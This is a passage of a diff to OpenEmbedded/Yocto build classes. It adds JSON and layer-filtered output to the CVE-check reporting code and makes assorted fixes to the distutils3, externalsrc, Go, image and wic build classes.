+        return
+
+    if include_layers and layer not in include_layers:
+        return
+
+    # Early exit, the text format does not report packages without CVEs
+    if not patched+unpatched+whitelisted:
+        return
+
+    nvd_link = "https://nvd.nist.gov/vuln/detail/"
     write_string = ""
     unpatched_cves = []
     bb.utils.mkdirhier(os.path.dirname(cve_file))
 
     for cve in sorted(cve_data):
+        is_patched = cve in patched
+        is_ignored = cve in whitelisted
+
+        if (is_patched or is_ignored) and not report_all:
+            continue
+
+        write_string += "LAYER: %s\n" % layer
         write_string += "PACKAGE NAME: %s\n" % d.getVar("PN")
         write_string += "PACKAGE VERSION: %s%s\n" % (d.getVar("EXTENDPE"), d.getVar("PV"))
         write_string += "CVE: %s\n" % cve
-        if cve in whitelisted:
+        if is_ignored:
             write_string += "CVE STATUS: Whitelisted\n"
-        elif cve in patched:
+        elif is_patched:
             write_string += "CVE STATUS: Patched\n"
         else:
             unpatched_cves.append(cve)
@@ -347,7 +453,7 @@ def cve_write_data(d, patched, unpatched, whitelisted, cve_data):
         write_string += "VECTOR: %s\n" % cve_data[cve]["vector"]
         write_string += "MORE INFORMATION: %s%s\n\n" % (nvd_link, cve)
 
-    if unpatched_cves:
+    if unpatched_cves and d.getVar("CVE_CHECK_SHOW_WARNINGS") == "1":
         bb.warn("Found unpatched CVE (%s), for more information check %s" % (" ".join(unpatched_cves),cve_file))
 
     with open(cve_file, "w") as f:
@@ -355,9 +461,8 @@ def cve_write_data(d, patched, unpatched, whitelisted, cve_data):
         f.write(write_string)
 
     if d.getVar("CVE_CHECK_COPY_FILES") == "1":
-        cve_dir = d.getVar("CVE_CHECK_DIR")
-        bb.utils.mkdirhier(cve_dir)
-        deploy_file = os.path.join(cve_dir, d.getVar("PN"))
+        deploy_file = d.getVar("CVE_CHECK_RECIPE_FILE")
+        bb.utils.mkdirhier(os.path.dirname(deploy_file))
         with open(deploy_file, "w") as f:
             f.write(write_string)
 
@@ -367,3 +472,119 @@ def cve_write_data(d, patched, unpatched, whitelisted, cve_data):
 
         with open(d.getVar("CVE_CHECK_TMP_FILE"), "a") as f:
             f.write("%s" % write_string)
+
+def cve_check_write_json_output(d, output, direct_file, deploy_file, manifest_file):
+    """
+    Write CVE information in the JSON format: to WORKDIR; and to
+    CVE_CHECK_DIR, if CVE manifest if enabled, write fragment
+    files that will be assembled at the end in cve_check_write_rootfs_manifest.
+    """
+
+    import json
+
+    write_string = json.dumps(output, indent=2)
+    with open(direct_file, "w") as f:
+        bb.note("Writing file %s with CVE information" % direct_file)
+        f.write(write_string)
+
+    if d.getVar("CVE_CHECK_COPY_FILES") == "1":
+        bb.utils.mkdirhier(os.path.dirname(deploy_file))
+        with open(deploy_file, "w") as f:
+            f.write(write_string)
+
+    if d.getVar("CVE_CHECK_CREATE_MANIFEST") == "1":
+        cvelogpath = d.getVar("CVE_CHECK_SUMMARY_DIR")
+        index_path = d.getVar("CVE_CHECK_SUMMARY_INDEX_PATH")
+        bb.utils.mkdirhier(cvelogpath)
+        fragment_file = os.path.basename(deploy_file)
+        fragment_path = os.path.join(cvelogpath, fragment_file)
+        with open(fragment_path, "w") as f:
+            f.write(write_string)
+        with open(index_path, "a+") as f:
+            f.write("%s\n" % fragment_path)
+
+def cve_write_data_json(d, patched, unpatched, ignored, cve_data, cve_status):
+    """
+    Prepare CVE data for the JSON format, then write it.
+    """
+
+    output = {"version":"1", "package": []}
+    nvd_link = "https://nvd.nist.gov/vuln/detail/"
+
+    fdir_name  = d.getVar("FILE_DIRNAME")
+    layer = fdir_name.split("/")[-3]
+
+    include_layers = d.getVar("CVE_CHECK_LAYER_INCLUDELIST").split()
+    exclude_layers = d.getVar("CVE_CHECK_LAYER_EXCLUDELIST").split()
+
+    report_all = d.getVar("CVE_CHECK_REPORT_PATCHED") == "1"
+
+    if exclude_layers and layer in exclude_layers:
+        return
+
+    if include_layers and layer not in include_layers:
+        return
+
+    unpatched_cves = []
+
+    product_data = []
+    for s in cve_status:
+        p = {"product": s[0], "cvesInRecord": "Yes"}
+        if s[1] == False:
+            p["cvesInRecord"] = "No"
+        product_data.append(p)
+
+    package_version = "%s%s" % (d.getVar("EXTENDPE"), d.getVar("PV"))
+    package_data = {
+        "name" : d.getVar("PN"),
+        "layer" : layer,
+        "version" : package_version,
+        "products": product_data
+    }
+    cve_list = []
+
+    for cve in sorted(cve_data):
+        is_patched = cve in patched
+        is_ignored = cve in ignored
+        status = "Unpatched"
+        if (is_patched or is_ignored) and not report_all:
+            continue
+        if is_ignored:
+            status = "Ignored"
+        elif is_patched:
+            status = "Patched"
+        else:
+            # default value of status is Unpatched
+            unpatched_cves.append(cve)
+
+        issue_link = "%s%s" % (nvd_link, cve)
+
+        cve_item = {
+            "id" : cve,
+            "summary" : cve_data[cve]["summary"],
+            "scorev2" : cve_data[cve]["scorev2"],
+            "scorev3" : cve_data[cve]["scorev3"],
+            "vector" : cve_data[cve]["vector"],
+            "status" : status,
+            "link": issue_link
+        }
+        cve_list.append(cve_item)
+
+    package_data["issue"] = cve_list
+    output["package"].append(package_data)
+
+    direct_file = d.getVar("CVE_CHECK_LOG_JSON")
+    deploy_file = d.getVar("CVE_CHECK_RECIPE_FILE_JSON")
+    manifest_file = d.getVar("CVE_CHECK_SUMMARY_FILE_NAME_JSON")
+
+    cve_check_write_json_output(d, output, direct_file, deploy_file, manifest_file)
+
+def cve_write_data(d, patched, unpatched, ignored, cve_data, status):
+    """
+    Write CVE data in each enabled format.
+    """
+
+    if d.getVar("CVE_CHECK_FORMAT_TEXT") == "1":
+        cve_write_data_text(d, patched, unpatched, ignored, cve_data)
+    if d.getVar("CVE_CHECK_FORMAT_JSON") == "1":
+        cve_write_data_json(d, patched, unpatched, ignored, cve_data, status)
diff --git a/meta/classes/devshell.bbclass b/meta/classes/devshell.bbclass
index fdf7dc100f..76dd0b42ee 100644
--- a/meta/classes/devshell.bbclass
+++ b/meta/classes/devshell.bbclass
@@ -128,6 +128,7 @@ def devpyshell(d):
                     more = i.runsource(source, "<pyshell>")
                     if not more:
                         buf = []
+                    sys.stderr.flush()
                     prompt(more)
             except KeyboardInterrupt:
                 i.write("\nKeyboardInterrupt\n")
diff --git a/meta/classes/devtool-source.bbclass b/meta/classes/devtool-source.bbclass
index 280d6009f3..41900e651f 100644
--- a/meta/classes/devtool-source.bbclass
+++ b/meta/classes/devtool-source.bbclass
@@ -199,6 +199,7 @@ python devtool_post_patch() {
             # Run do_patch function with the override applied
             localdata = bb.data.createCopy(d)
             localdata.setVar('OVERRIDES', ':'.join(no_overrides))
+            localdata.setVar('FILESOVERRIDES', ':'.join(no_overrides))
             bb.build.exec_func('do_patch', localdata)
             rm_patches()
             # Now we need to reconcile the dev branch with the no-overrides one
@@ -216,7 +217,8 @@ python devtool_post_patch() {
                 # Reset back to the initial commit on a new branch
                 bb.process.run('git checkout %s -b devtool-override-%s' % (initial_rev, override), cwd=srcsubdir)
                 # Run do_patch function with the override applied
-                localdata.appendVar('OVERRIDES', ':%s' % override)
+                localdata.setVar('OVERRIDES', ':'.join(no_overrides + [override]))
+                localdata.setVar('FILESOVERRIDES', ':'.join(no_overrides + [override]))
                 bb.build.exec_func('do_patch', localdata)
                 rm_patches()
                 # Now we need to reconcile the new branch with the no-overrides one
diff --git a/meta/classes/devupstream.bbclass b/meta/classes/devupstream.bbclass
index 7780c5482c..97e137cb40 100644
--- a/meta/classes/devupstream.bbclass
+++ b/meta/classes/devupstream.bbclass
@@ -4,7 +4,7 @@
 #
 # Usage:
 # BBCLASSEXTEND = "devupstream:target"
-# SRC_URI_class-devupstream = "git://git.example.com/example"
+# SRC_URI_class-devupstream = "git://git.example.com/example;branch=master"
 # SRCREV_class-devupstream = "abcdef"
 #
 # If the first entry in SRC_URI is a git: URL then S is rewritten to
diff --git a/meta/classes/distutils-common-base.bbclass b/meta/classes/distutils-common-base.bbclass
index 94b5fd426d..43a38e5a3a 100644
--- a/meta/classes/distutils-common-base.bbclass
+++ b/meta/classes/distutils-common-base.bbclass
@@ -11,7 +11,7 @@ export LDCXXSHARED  = "${CXX} -shared"
 export CCSHARED  = "-fPIC -DPIC"
 # LINKFORSHARED are the flags passed to the $(CC) command that links
 # the python executable
-export LINKFORSHARED = "{SECURITY_CFLAGS} -Xlinker -export-dynamic"
+export LINKFORSHARED = "${SECURITY_CFLAGS} -Xlinker -export-dynamic"
 
 FILES_${PN} += "${libdir}/* ${libdir}/${PYTHON_DIR}/*"
 
diff --git a/meta/classes/distutils3-base.bbclass b/meta/classes/distutils3-base.bbclass
index 7dbf07ac4b..a277d1c7bc 100644
--- a/meta/classes/distutils3-base.bbclass
+++ b/meta/classes/distutils3-base.bbclass
@@ -1,5 +1,5 @@
 DEPENDS  += "${@["${PYTHON_PN}-native ${PYTHON_PN}", ""][(d.getVar('PACKAGES') == '')]}"
 RDEPENDS_${PN} += "${@['', '${PYTHON_PN}-core']['${CLASSOVERRIDE}' == 'class-target']}"
 
-inherit distutils-common-base python3native
+inherit distutils-common-base python3native python3targetconfig
 
diff --git a/meta/classes/distutils3.bbclass b/meta/classes/distutils3.bbclass
index 7356b5245a..a916a8000c 100644
--- a/meta/classes/distutils3.bbclass
+++ b/meta/classes/distutils3.bbclass
@@ -12,28 +12,30 @@ DISTUTILS_INSTALL_ARGS ?= "--root=${D} \
 DISTUTILS_PYTHON = "python3"
 DISTUTILS_PYTHON_class-native = "nativepython3"
 
+DISTUTILS_SETUP_PATH ?= "${S}"
+
 distutils3_do_configure() {
     :
 }
 
 distutils3_do_compile() {
-        cd ${S}
+        cd ${DISTUTILS_SETUP_PATH}
         NO_FETCH_BUILD=1 \
         STAGING_INCDIR=${STAGING_INCDIR} \
         STAGING_LIBDIR=${STAGING_LIBDIR} \
-        ${STAGING_BINDIR_NATIVE}/${PYTHON_PN}-native/${PYTHON_PN} ${S}/setup.py \
+        ${STAGING_BINDIR_NATIVE}/${PYTHON_PN}-native/${PYTHON_PN} setup.py \
         build --build-base=${B} ${DISTUTILS_BUILD_ARGS} || \
         bbfatal_log "'${PYTHON_PN} setup.py build ${DISTUTILS_BUILD_ARGS}' execution failed."
 }
 distutils3_do_compile[vardepsexclude] = "MACHINE"
 
 distutils3_do_install() {
-        cd ${S}
+        cd ${DISTUTILS_SETUP_PATH}
         install -d ${D}${PYTHON_SITEPACKAGES_DIR}
         STAGING_INCDIR=${STAGING_INCDIR} \
         STAGING_LIBDIR=${STAGING_LIBDIR} \
         PYTHONPATH=${D}${PYTHON_SITEPACKAGES_DIR} \
-        ${STAGING_BINDIR_NATIVE}/${PYTHON_PN}-native/${PYTHON_PN} ${S}/setup.py \
+        ${STAGING_BINDIR_NATIVE}/${PYTHON_PN}-native/${PYTHON_PN} setup.py \
         build --build-base=${B} install --skip-build ${DISTUTILS_INSTALL_ARGS} || \
         bbfatal_log "'${PYTHON_PN} setup.py install ${DISTUTILS_INSTALL_ARGS}' execution failed."
 
diff --git a/meta/classes/externalsrc.bbclass b/meta/classes/externalsrc.bbclass
index d200129987..9c9451e528 100644
--- a/meta/classes/externalsrc.bbclass
+++ b/meta/classes/externalsrc.bbclass
@@ -60,7 +60,7 @@ python () {
         if externalsrcbuild:
             d.setVar('B', externalsrcbuild)
         else:
-            d.setVar('B', '${WORKDIR}/${BPN}-${PV}/')
+            d.setVar('B', '${WORKDIR}/${BPN}-${PV}')
 
         local_srcuri = []
         fetch = bb.fetch2.Fetch((d.getVar('SRC_URI') or '').split(), d)
@@ -108,6 +108,15 @@ python () {
             if local_srcuri and task in fetch_tasks:
                 continue
             bb.build.deltask(task, d)
+            if bb.data.inherits_class('reproducible_build', d) and task == 'do_unpack':
+                # The reproducible_build's create_source_date_epoch_stamp function must
+                # be run after the source is available and before the
+                # do_deploy_source_date_epoch task.  In the normal case, it's attached
+                # to do_unpack as a postfuncs, but since we removed do_unpack (above)
+                # we need to move the function elsewhere.  The easiest thing to do is
+                # move it into the prefuncs of the do_deploy_source_date_epoch task.
+                # This is safe, as externalsrc runs with the source already unpacked.
+                d.prependVarFlag('do_deploy_source_date_epoch', 'prefuncs', 'create_source_date_epoch_stamp ')
 
         d.prependVarFlag('do_compile', 'prefuncs', "externalsrc_compile_prefunc ")
         d.prependVarFlag('do_configure', 'prefuncs', "externalsrc_configure_prefunc ")
@@ -190,6 +199,7 @@ def srctree_hash_files(d, srcdir=None):
     import shutil
     import subprocess
     import tempfile
+    import hashlib
 
     s_dir = srcdir or d.getVar('EXTERNALSRC')
     git_dir = None
@@ -197,6 +207,10 @@ def srctree_hash_files(d, srcdir=None):
     try:
         git_dir = os.path.join(s_dir,
             subprocess.check_output(['git', '-C', s_dir, 'rev-parse', '--git-dir'], stderr=subprocess.DEVNULL).decode("utf-8").rstrip())
+        top_git_dir = os.path.join(d.getVar("TOPDIR"),
+            subprocess.check_output(['git', '-C', d.getVar("TOPDIR"), 'rev-parse', '--git-dir'], stderr=subprocess.DEVNULL).decode("utf-8").rstrip())
+        if git_dir == top_git_dir:
+            git_dir = None
     except subprocess.CalledProcessError:
         pass
 
@@ -210,7 +224,18 @@ def srctree_hash_files(d, srcdir=None):
             env = os.environ.copy()
             env['GIT_INDEX_FILE'] = tmp_index.name
             subprocess.check_output(['git', 'add', '-A', '.'], cwd=s_dir, env=env)
-            sha1 = subprocess.check_output(['git', 'write-tree'], cwd=s_dir, env=env).decode("utf-8")
+            git_sha1 = subprocess.check_output(['git', 'write-tree'], cwd=s_dir, env=env).decode("utf-8")
+            if os.path.exists(os.path.join(s_dir, ".gitmodules")) and os.path.getsize(os.path.join(s_dir, ".gitmodules")) > 0:
+                submodule_helper = subprocess.check_output(["git", "config", "--file", ".gitmodules", "--get-regexp", "path"], cwd=s_dir, env=env).decode("utf-8")
+                for line in submodule_helper.splitlines():
+                    module_dir = os.path.join(s_dir, line.rsplit(maxsplit=1)[1])
+                    if os.path.isdir(module_dir):
+                        proc = subprocess.Popen(['git', 'add', '-A', '.'], cwd=module_dir, env=env, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
+                        proc.communicate()
+                        proc = subprocess.Popen(['git', 'write-tree'], cwd=module_dir, env=env, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
+                        stdout, _ = proc.communicate()
+                        git_sha1 += stdout.decode("utf-8")
+            sha1 = hashlib.sha1(git_sha1.encode("utf-8")).hexdigest()
         with open(oe_hash_file, 'w') as fobj:
             fobj.write(sha1)
         ret = oe_hash_file + ':True'
diff --git a/meta/classes/fs-uuid.bbclass b/meta/classes/fs-uuid.bbclass
index 9b53dfba7a..731ea575bd 100644
--- a/meta/classes/fs-uuid.bbclass
+++ b/meta/classes/fs-uuid.bbclass
@@ -4,7 +4,7 @@
 def get_rootfs_uuid(d):
     import subprocess
     rootfs = d.getVar('ROOTFS')
-    output = subprocess.check_output(['tune2fs', '-l', rootfs])
+    output = subprocess.check_output(['tune2fs', '-l', rootfs], text=True)
     for line in output.split('\n'):
         if line.startswith('Filesystem UUID:'):
             uuid = line.split()[-1]
diff --git a/meta/classes/go.bbclass b/meta/classes/go.bbclass
index a9e31b50ea..21b1a0271e 100644
--- a/meta/classes/go.bbclass
+++ b/meta/classes/go.bbclass
@@ -115,9 +115,10 @@ go_do_install() {
 	install -d ${D}${libdir}/go/src/${GO_IMPORT}
 	tar -C ${S}/src/${GO_IMPORT} -cf - --exclude-vcs --exclude '*.test' --exclude 'testdata' . | \
 		tar -C ${D}${libdir}/go/src/${GO_IMPORT} --no-same-owner -xf -
-	tar -C ${B} -cf - --exclude-vcs pkg | tar -C ${D}${libdir}/go --no-same-owner -xf -
+	tar -C ${B} -cf - --exclude-vcs --exclude '*.test' --exclude 'testdata' pkg | \
+		tar -C ${D}${libdir}/go --no-same-owner -xf -
 
-	if [ -n "`ls ${B}/${GO_BUILD_BINDIR}/`" ]; then
+	if ls ${B}/${GO_BUILD_BINDIR}/* >/dev/null 2>/dev/null ; then
 		install -d ${D}${bindir}
 		install -m 0755 ${B}/${GO_BUILD_BINDIR}/* ${D}${bindir}/
 	fi
@@ -144,11 +145,11 @@ FILES_${PN}-staticdev = "${libdir}/go/pkg"
 
 INSANE_SKIP_${PN} += "ldflags"
 
-# Add -buildmode=pie to GOBUILDFLAGS to satisfy "textrel" QA checking, but mips
-# doesn't support -buildmode=pie, so skip the QA checking for mips and its
-# variants.
+# Add -buildmode=pie to GOBUILDFLAGS to satisfy "textrel" QA checking, but
+# windows/mips/riscv doesn't support -buildmode=pie, so skip the QA checking
+# for windows/mips/riscv and their variants.
 python() {
-    if 'mips' in d.getVar('TARGET_ARCH') or 'riscv' in d.getVar('TARGET_ARCH'):
+    if 'mips' in d.getVar('TARGET_ARCH') or 'riscv' in d.getVar('TARGET_ARCH') or 'windows' in d.getVar('TARGET_GOOS'):
         d.appendVar('INSANE_SKIP_%s' % d.getVar('PN'), " textrel")
     else:
         d.appendVar('GOBUILDFLAGS', ' -buildmode=pie')
diff --git a/meta/classes/goarch.bbclass b/meta/classes/goarch.bbclass
index 1099b95769..ecd3044edd 100644
--- a/meta/classes/goarch.bbclass
+++ b/meta/classes/goarch.bbclass
@@ -114,6 +114,8 @@ def go_map_mips(a, f, d):
 def go_map_os(o, d):
     if o.startswith('linux'):
         return 'linux'
+    elif o.startswith('mingw'):
+        return 'windows'
     return o
 
 
diff --git a/meta/classes/grub-efi-cfg.bbclass b/meta/classes/grub-efi-cfg.bbclass
index 3a2cdd698b..ea21b3de3d 100644
--- a/meta/classes/grub-efi-cfg.bbclass
+++ b/meta/classes/grub-efi-cfg.bbclass
@@ -120,3 +120,4 @@ python build_efi_cfg() {
 
     cfgfile.close()
 }
+build_efi_cfg[vardepsexclude] += "OVERRIDES"
diff --git a/meta/classes/image-live.bbclass b/meta/classes/image-live.bbclass
index 54058b350d..2fa839b0de 100644
--- a/meta/classes/image-live.bbclass
+++ b/meta/classes/image-live.bbclass
@@ -30,7 +30,7 @@ do_bootimg[depends] += "dosfstools-native:do_populate_sysroot \
                         virtual/kernel:do_deploy \
                         ${MLPREFIX}syslinux:do_populate_sysroot \
                         syslinux-native:do_populate_sysroot \
-                        ${PN}:do_image_${@d.getVar('LIVE_ROOTFS_TYPE').replace('-', '_')} \
+                        ${@'%s:do_image_%s' % (d.getVar('PN'), d.getVar('LIVE_ROOTFS_TYPE').replace('-', '_')) if d.getVar('ROOTFS') else ''} \
                         "
 
 
@@ -261,4 +261,4 @@ python do_bootimg() {
 do_bootimg[subimages] = "hddimg iso"
 do_bootimg[imgsuffix] = "."
 
-addtask bootimg before do_image_complete
+addtask bootimg before do_image_complete after do_rootfs
diff --git a/meta/classes/image.bbclass b/meta/classes/image.bbclass
index 459d872b4a..fbf7206d04 100644
--- a/meta/classes/image.bbclass
+++ b/meta/classes/image.bbclass
@@ -38,7 +38,7 @@ IMAGE_FEATURES[validitems] += "debug-tweaks read-only-rootfs stateless-rootfs em
 # Generate companion debugfs?
 IMAGE_GEN_DEBUGFS ?= "0"
 
-# These pacackages will be installed as additional into debug rootfs
+# These packages will be installed as additional into debug rootfs
 IMAGE_INSTALL_DEBUGFS ?= ""
 
 # These packages will be removed from a read-only rootfs after all other
@@ -115,7 +115,7 @@ def rootfs_command_variables(d):
             'IMAGE_PREPROCESS_COMMAND','RPM_PREPROCESS_COMMANDS','RPM_POSTPROCESS_COMMANDS','DEB_PREPROCESS_COMMANDS','DEB_POSTPROCESS_COMMANDS']
 
 python () {
-    variables = rootfs_command_variables(d) + sdk_command_variables(d)
+    variables = rootfs_command_variables(d)
     for var in variables:
         if d.getVar(var, False):
             d.setVarFlag(var, 'func', '1')
@@ -124,7 +124,7 @@ python () {
 def rootfs_variables(d):
     from oe.rootfs import variable_depends
     variables = ['IMAGE_DEVICE_TABLE','IMAGE_DEVICE_TABLES','BUILD_IMAGES_FROM_FEEDS','IMAGE_TYPES_MASKED','IMAGE_ROOTFS_ALIGNMENT','IMAGE_OVERHEAD_FACTOR','IMAGE_ROOTFS_SIZE','IMAGE_ROOTFS_EXTRA_SPACE',
-                 'IMAGE_ROOTFS_MAXSIZE','IMAGE_NAME','IMAGE_LINK_NAME','IMAGE_MANIFEST','DEPLOY_DIR_IMAGE','IMAGE_FSTYPES','IMAGE_INSTALL_COMPLEMENTARY','IMAGE_LINGUAS', 'IMAGE_LINGUAS_COMPLEMENTARY',
+                 'IMAGE_ROOTFS_MAXSIZE','IMAGE_NAME','IMAGE_LINK_NAME','IMAGE_MANIFEST','DEPLOY_DIR_IMAGE','IMAGE_FSTYPES','IMAGE_INSTALL_COMPLEMENTARY','IMAGE_LINGUAS', 'IMAGE_LINGUAS_COMPLEMENTARY', 'IMAGE_LOCALES_ARCHIVE',
                  'MULTILIBRE_ALLOW_REP','MULTILIB_TEMP_ROOTFS','MULTILIB_VARIANTS','MULTILIBS','ALL_MULTILIB_PACKAGE_ARCHS','MULTILIB_GLOBAL_VARIANTS','BAD_RECOMMENDATIONS','NO_RECOMMENDATIONS',
                  'PACKAGE_ARCHS','PACKAGE_CLASSES','TARGET_VENDOR','TARGET_ARCH','TARGET_OS','OVERRIDES','BBEXTENDVARIANT','FEED_DEPLOYDIR_BASE_URI','INTERCEPT_DIR','USE_DEVFS',
                  'CONVERSIONTYPES', 'IMAGE_GEN_DEBUGFS', 'ROOTFS_RO_UNNEEDED', 'IMGDEPLOYDIR', 'PACKAGE_EXCLUDE_COMPLEMENTARY', 'REPRODUCIBLE_TIMESTAMP_ROOTFS', 'IMAGE_INSTALL_DEBUGFS']
@@ -176,10 +176,15 @@ IMAGE_LINGUAS ?= "de-de fr-fr en-gb"
 
 LINGUAS_INSTALL ?= "${@" ".join(map(lambda s: "locale-base-%s" % s, d.getVar('IMAGE_LINGUAS').split()))}"
 
+# per default create a locale archive
+IMAGE_LOCALES_ARCHIVE ?= '1'
+
 # Prefer image, but use the fallback files for lookups if the image ones
 # aren't yet available.
 PSEUDO_PASSWD = "${IMAGE_ROOTFS}:${STAGING_DIR_NATIVE}"
 
+PSEUDO_IGNORE_PATHS .= ",${WORKDIR}/intercept_scripts,${WORKDIR}/oe-rootfs-repo,${WORKDIR}/sstate-build-image_complete"
+
 PACKAGE_EXCLUDE ??= ""
 PACKAGE_EXCLUDE[type] = "list"
 
@@ -306,7 +311,7 @@ fakeroot python do_image_qa () {
         except oe.utils.ImageQAFailed as e:
             qamsg = qamsg + '\tImage QA function %s failed: %s\n' % (e.name, e.description)
         except Exception as e:
-            qamsg = qamsg + '\tImage QA function %s failed\n' % cmd
+            qamsg = qamsg + '\tImage QA function %s failed: %s\n' % (cmd, e)
 
     if qamsg:
         imgname = d.getVar('IMAGE_NAME')
@@ -432,7 +437,7 @@ python () {
         localdata.delVar('DATETIME')
         localdata.delVar('DATE')
         localdata.delVar('TMPDIR')
-        vardepsexclude = (d.getVarFlag('IMAGE_CMD_' + realt, 'vardepsexclude', True) or '').split()
+        vardepsexclude = (d.getVarFlag('IMAGE_CMD_' + realt, 'vardepsexclude') or '').split()
         for dep in vardepsexclude:
             localdata.delVar(dep)
 
@@ -660,7 +665,7 @@ reproducible_final_image_task () {
         fi
         # Set mtime of all files to a reproducible value
         bbnote "reproducible_final_image_task: mtime set to $REPRODUCIBLE_TIMESTAMP_ROOTFS"
-        find  ${IMAGE_ROOTFS} -exec touch -h  --date=@$REPRODUCIBLE_TIMESTAMP_ROOTFS {} \;
+        find  ${IMAGE_ROOTFS} -print0 | xargs -0 touch -h  --date=@$REPRODUCIBLE_TIMESTAMP_ROOTFS
     fi
 }
 
diff --git a/meta/classes/image_types.bbclass b/meta/classes/image_types.bbclass
index f82f1d8862..6dc0e094d0 100644
--- a/meta/classes/image_types.bbclass
+++ b/meta/classes/image_types.bbclass
@@ -126,7 +126,7 @@ IMAGE_CMD_squashfs-lz4 = "mksquashfs ${IMAGE_ROOTFS} ${IMGDEPLOYDIR}/${IMAGE_NAM
 # required when extracting, but it seems prudent to use it in both cases.
 IMAGE_CMD_TAR ?= "tar"
 # ignore return code 1 "file changed as we read it" as other tasks(e.g. do_image_wic) may be hardlinking rootfs
-IMAGE_CMD_tar = "${IMAGE_CMD_TAR} --numeric-owner -cf ${IMGDEPLOYDIR}/${IMAGE_NAME}${IMAGE_NAME_SUFFIX}.tar -C ${IMAGE_ROOTFS} . || [ $? -eq 1 ]"
+IMAGE_CMD_tar = "${IMAGE_CMD_TAR} --sort=name --format=posix --numeric-owner -cf ${IMGDEPLOYDIR}/${IMAGE_NAME}${IMAGE_NAME_SUFFIX}.tar -C ${IMAGE_ROOTFS} . || [ $? -eq 1 ]"
 
 do_image_cpio[cleandirs] += "${WORKDIR}/cpio_append"
 IMAGE_CMD_cpio () {
@@ -240,7 +240,7 @@ EXTRA_IMAGECMD_jffs2 ?= "--pad ${JFFS2_ENDIANNESS} --eraseblock=${JFFS2_ERASEBLO
 EXTRA_IMAGECMD_ext2 ?= "-i 4096"
 EXTRA_IMAGECMD_ext3 ?= "-i 4096"
 EXTRA_IMAGECMD_ext4 ?= "-i 4096"
-EXTRA_IMAGECMD_btrfs ?= "-n 4096"
+EXTRA_IMAGECMD_btrfs ?= "-n 4096 --shrink"
 EXTRA_IMAGECMD_f2fs ?= ""
 
 do_image_cpio[depends] += "cpio-native:do_populate_sysroot"
diff --git a/meta/classes/image_types_wic.bbclass b/meta/classes/image_types_wic.bbclass
index 196c86814e..ae00acc5ea 100644
--- a/meta/classes/image_types_wic.bbclass
+++ b/meta/classes/image_types_wic.bbclass
@@ -3,9 +3,9 @@
 WICVARS ?= "\
            BBLAYERS IMGDEPLOYDIR DEPLOY_DIR_IMAGE FAKEROOTCMD IMAGE_BASENAME IMAGE_BOOT_FILES \
            IMAGE_LINK_NAME IMAGE_ROOTFS INITRAMFS_FSTYPES INITRD INITRD_LIVE ISODIR RECIPE_SYSROOT_NATIVE \
-           ROOTFS_SIZE STAGING_DATADIR STAGING_DIR STAGING_LIBDIR TARGET_SYS \
+           ROOTFS_SIZE STAGING_DATADIR STAGING_DIR STAGING_LIBDIR TARGET_SYS HOSTTOOLS_DIR \
            KERNEL_IMAGETYPE MACHINE INITRAMFS_IMAGE INITRAMFS_IMAGE_BUNDLE INITRAMFS_LINK_NAME APPEND \
-           ASSUME_PROVIDED"
+           ASSUME_PROVIDED PSEUDO_IGNORE_PATHS"
 
 inherit ${@bb.utils.contains('INITRAMFS_IMAGE_BUNDLE', '1', 'kernel-artifact-names', '', d)}
 
@@ -29,17 +29,24 @@ WIC_CREATE_EXTRA_ARGS ?= ""
 IMAGE_CMD_wic () {
 	out="${IMGDEPLOYDIR}/${IMAGE_NAME}"
 	build_wic="${WORKDIR}/build-wic"
+	tmp_wic="${WORKDIR}/tmp-wic"
 	wks="${WKS_FULL_PATH}"
+	if [ -e "$tmp_wic" ]; then
+		# Ensure we don't have any junk leftover from a previously interrupted
+		# do_image_wic execution
+		rm -rf "$tmp_wic"
+	fi
 	if [ -z "$wks" ]; then
 		bbfatal "No kickstart files from WKS_FILES were found: ${WKS_FILES}. Please set WKS_FILE or WKS_FILES appropriately."
 	fi
-
-	BUILDDIR="${TOPDIR}" wic create "$wks" --vars "${STAGING_DIR}/${MACHINE}/imgdata/" -e "${IMAGE_BASENAME}" -o "$build_wic/" ${WIC_CREATE_EXTRA_ARGS}
+	BUILDDIR="${TOPDIR}" PSEUDO_UNLOAD=1 wic create "$wks" --vars "${STAGING_DIR}/${MACHINE}/imgdata/" -e "${IMAGE_BASENAME}" -o "$build_wic/" -w "$tmp_wic" ${WIC_CREATE_EXTRA_ARGS}
 	mv "$build_wic/$(basename "${wks%.wks}")"*.direct "$out${IMAGE_NAME_SUFFIX}.wic"
 }
 IMAGE_CMD_wic[vardepsexclude] = "WKS_FULL_PATH WKS_FILES TOPDIR"
 do_image_wic[cleandirs] = "${WORKDIR}/build-wic"
 
+PSEUDO_IGNORE_PATHS .= ",${WORKDIR}/build-wic"
+
 # Rebuild when the wks file or vars in WICVARS change
 USING_WIC = "${@bb.utils.contains_any('IMAGE_FSTYPES', 'wic ' + ' '.join('wic.%s' % c for c in '${CONVERSIONTYPES}'.split()), '1', '', d)}"
 WKS_FILE_CHECKSUM = "${@'${WKS_FULL_PATH}:%s' % os.path.exists('${WKS_FULL_PATH}') if '${USING_WIC}' else ''}"
@@ -87,6 +94,10 @@ python do_write_wks_template () {
     bb.utils.copyfile(wks_file, "%s/%s" % (depdir, basename + '-' + os.path.basename(wks_file)))
 }
 
+do_flush_pseudodb() {
+	${FAKEROOTENV} ${FAKEROOTCMD} -S
+}
+
 python () {
     if d.getVar('USING_WIC'):
         wks_file_u = d.getVar('WKS_FULL_PATH', False)
@@ -140,6 +151,7 @@ python do_rootfs_wicenv () {
     depdir = d.getVar('IMGDEPLOYDIR')
     bb.utils.copyfile(os.path.join(outdir, basename) + '.env', os.path.join(depdir, basename) + '.env')
 }
+addtask do_flush_pseudodb after do_rootfs before do_image do_image_qa
 addtask do_rootfs_wicenv after do_image before do_image_wic
 do_rootfs_wicenv[vardeps] += "${WICVARS}"
 do_rootfs_wicenv[prefuncs] = 'set_image_size'
diff --git a/meta/classes/insane.bbclass b/meta/classes/insane.bbclass
index b5c6b2186f..d6da53252f 100644
--- a/meta/classes/insane.bbclass
+++ b/meta/classes/insane.bbclass
@@ -174,7 +174,7 @@ def package_qa_check_useless_rpaths(file, name, d, elf, messages):
             if rpath_eq(rpath, libdir) or rpath_eq(rpath, base_libdir):
                 # The dynamic linker searches both these places anyway.  There is no point in
                 # looking there again.
-                package_qa_add_message(messages, "useless-rpaths", "%s: %s contains probably-redundant RPATH %s" % (name, package_qa_clean_path(file, d), rpath))
+                package_qa_add_message(messages, "useless-rpaths", "%s: %s contains probably-redundant RPATH %s" % (name, package_qa_clean_path(file, d, name), rpath))
 
